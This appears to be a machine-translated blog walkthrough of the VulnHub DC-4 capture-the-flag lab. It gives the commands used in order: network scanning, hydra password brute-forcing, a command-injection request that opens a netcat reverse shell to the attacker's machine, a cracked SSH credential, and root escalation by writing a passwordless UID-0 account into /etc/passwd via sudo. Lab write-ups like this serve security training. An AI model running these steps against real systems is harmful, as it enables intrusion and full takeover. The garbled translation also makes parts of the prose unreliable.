当前位置:网站首页>【Try to Hack】vulnhub DC4
【Try to Hack】vulnhub DC4
2022-07-01 17:31:00 【Happy star】
Blog home page : Happy star The blog home page of
Series column :Try to Hack
Welcome to focus on the likes collection ️ Leaving a message.
Starting time :2022 year 7 month 1 Japan
The author's level is very limited , If an error is found , Please let me know , thank !
The target is in bridging mode by default
kali Set to bridge mode
The host found netdiscover
Drone aircraft ip by 192.168.0.151
namp -p- -A 192.168.0.151
ssh Service and http service
visit 80 port 
dirb Regular directory scanning dirb http://192.168.0.151
Two directories 403
whatweb http://192.168.0.151
This page doesn't work cwel Crawl dictionary
Upper weak password
On hydra, use john A dictionary with me /usr/share/john/password.lst
Known user name is adminhydra -l admin -P /usr/share/john/password.lst 192.168.0.151 http-get /
Can execute orders , But the command is dead
Grab the bag and have a look 
Yes indeed 
Bounces shellradio=nc+192.168.0.106+233+-e+/bin/sh&submit=Run
nc -lvvp 233
Pack 
python -c 'import pty;pty.spawn("/bin/bash")'
Get an interactive shell
ls /home
There are three users 
Turn over one by one
Only jim Can see 
Password 
Continue to turn jim Other documents under 
No permission to view mbox
Now look ssh service
Then save the three users as user.txt.
I directly copied the password backup file to kali In the attack plane
use hydra Blast ssh service hydra -L user.txt -P password.txt 192.168.0.151 ssh -t 60 
ssh Blast out a user
jim:jibril04
Log in and have a look ssh [email protected]
Login successful
You can see mbox
This is email ,root to jim Email sent , But there is no email content
stay /var/jim Found inside .( This /var/mail Is the default self-contained folder , It may be used to save emails )
Got it charles Password
Log in 
nothing
Now we can only consider raising the right
To us charles This user , Then use this user to raise rights 
test.sh have suid jurisdiction , But I don't know when it will run , I haven't seen it work .
First, consider using ping Raise the right , But it doesn't seem to work
use sudosudo -l
echo "happy::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
Construct a user with root jurisdiction , write in /etc/passwd
边栏推荐
- [Verilog quick start of Niuke network question brushing series] ~ priority encoder circuit ①
- 如何写出好代码 — 防御式编程指南
- Free lottery | explore the future series of blind box digital copyright works of "abadou" will be launched on the whole network!
- SystemVerilog structure (II)
- 中国茂金属聚乙烯(mPE)行业研究报告(2022版)
- (十七)DAC转换实验
- Girls who want to do software testing look here
- [mathematical modeling] [matlab] implementation of two-dimensional rectangular packing code
- ShenYu 网关开发:在本地启用运行
- Report on research and investment prospects of UHMWPE industry in China (2022 Edition)
猜你喜欢
(1) CNN network structure
Cookies and session keeping technology
GameFramework食用指南
Enter wechat applet
【Try to Hack】vulnhub DC4
官宣!香港科技大学(广州)获批!
在MeterSphere接口测试中如何使用JMeter函数和MockJS函数
Gold, silver and four want to change jobs, so we should seize the time to make up
Girls who want to do software testing look here
换掉UUID,NanoID更快更安全!
随机推荐
SystemVerilog structure (II)
重磅披露!上百个重要信息系统被入侵,主机成为重点攻击目标
pyqt5中,在控件上画柱状图
RadHat搭建内网YUM源服务器
Vulnhub range hacksudo Thor
反射型XSS漏洞
Research Report on China's enzyme Market Forecast and investment strategy (2022 Edition)
Mysql database - Advanced SQL statement (2)
在MeterSphere接口测试中如何使用JMeter函数和MockJS函数
两数之和c语言实现[通俗易懂]
ACL 2022 | decomposed meta learning small sample named entity recognition
【C语言补充】判断明天是哪一天(明天的日期)
GameFramework食用指南
ACM mm 2022 video understanding challenge video classification track champion autox team technology sharing
Vulnhub range hacker_ Kid-v1.0.1
Soft test software designer full truth simulation question (including answer analysis)
Pytest learning notes (13) -allure of allure Description () and @allure title()
Openlayers customize bubble boxes and navigate to bubble boxes
中国超高分子量聚乙烯产业调研与投资前景报告(2022版)
Replace UUID, nanoid is faster and safer!